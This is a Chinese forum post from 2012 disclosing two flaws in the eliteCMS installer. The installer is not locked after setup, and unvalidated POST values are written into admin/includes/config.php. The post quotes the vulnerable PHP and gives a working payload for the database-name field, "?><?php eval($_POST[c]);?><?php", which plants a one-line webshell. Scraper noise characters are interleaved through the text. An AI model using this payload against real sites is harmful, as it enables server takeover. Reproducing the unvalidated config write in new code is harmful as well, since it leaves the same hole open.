eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装$ ~/ O$ E# p. ]2 h c& s
* _; O ^! f9 J6 T% S6 m
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php# \2 w- v o) K
我们来看代码:
$ Q5 e0 }9 V# D! r4 H# P' J7 K
! ?( s6 |' F3 m. r/ b) T4 D& t...
4 e- x7 O) Y2 Celseif ($_GET['step'] == "4") {% h7 h) C) C1 U; q7 Z- [: d2 m
$file = "../admin/includes/config.php";
' z% S% L" C5 ^ $write = "<?php\n";' d% m/ [, P# \% V, u7 b6 ?
$write .= "/**\n";
7 ~$ L; w% s/ y& i3 ] $write .= "*\n";
0 h( G" d. R! m/ H $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
. y' b8 N2 A: `7 \3 s* r...略...# h+ q) ~( O" m/ M4 O9 x6 `- b
$write .= "*\n";
$ D7 u6 N! Y0 r $write .= "*/\n";0 t! W) U/ Q d' ~1 Q! T! E
$write .= "\n";" G5 R3 }) `9 L
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";) r" F g+ m ^( Y. I2 I
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";( [+ U, f3 M6 s6 q2 }
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
% d+ k0 V9 o6 E+ F0 O6 L5 J $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";/ C0 N" u8 l5 `* r: k
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
' k- w/ H( p7 [' V; B& x $write .= "if (!\$connection) {\n";
2 u' Y) Q2 f& G- K $write .= " die(\"Database connection failed\" .mysql_error());\n";$ | R, @5 I2 Y0 e
$write .= " \n";0 e+ k# u8 k6 R( Z3 z
$write .= "} \n";
$ s8 ~# ]/ g$ v! @- m: J $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";/ a$ X% b& h1 }: p- L
$write .= "if (!\$db_select) {\n";# k* u* T6 ~; R) U$ u5 h# B/ [
$write .= " die(\"Database select failed\" .mysql_error());\n";
+ x- M5 c( ?% U$ ]% J( J $write .= " \n";
: y% _7 J9 B F# \. }: J( q $write .= "} \n";2 I7 @( r" z! U" J
$write .= "?>\n";# A: ?( F+ @: D4 [6 E; q! n
# ]9 Y) F5 @) p/ ~
$writer = fopen($file, 'w');2 Z0 X0 S. I' {4 j0 I
..., l5 O, g( Z2 y, q( T6 d1 q8 _
0 t/ e( L: k' p% [8 k/ C在看代码:7 @2 Z7 Q3 X: R7 R- q7 Q; `
- P! Y& s. A/ K0 g, o$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];0 W! {6 B' P" m! p) O
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];! `3 K+ ^; R8 W; ?' C
$_SESSION['DB_USER'] = $_POST['DB_USER'];6 w0 h% r: T: M$ Y4 C
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];1 D3 Q7 S; X/ Z& R% @
1 ?) Q+ I0 m3 `) i: e4 {取值未作任何验证 R6 J. G- s+ }! C
如果将数据库名POST数据:
% R6 O8 z1 Y& J" ^
# K: T. z, m3 p" S"?><?php eval($_POST[c]);?><?php
$ k( ]( R7 F6 B* x$ o
% }' ?. j' E0 o. E将导致一句话后门写入/admin/includes/config.php
+ j; `) j4 j; J. s( ^ |
发表于 2012-11-18 13:59:27
收藏
支持
反对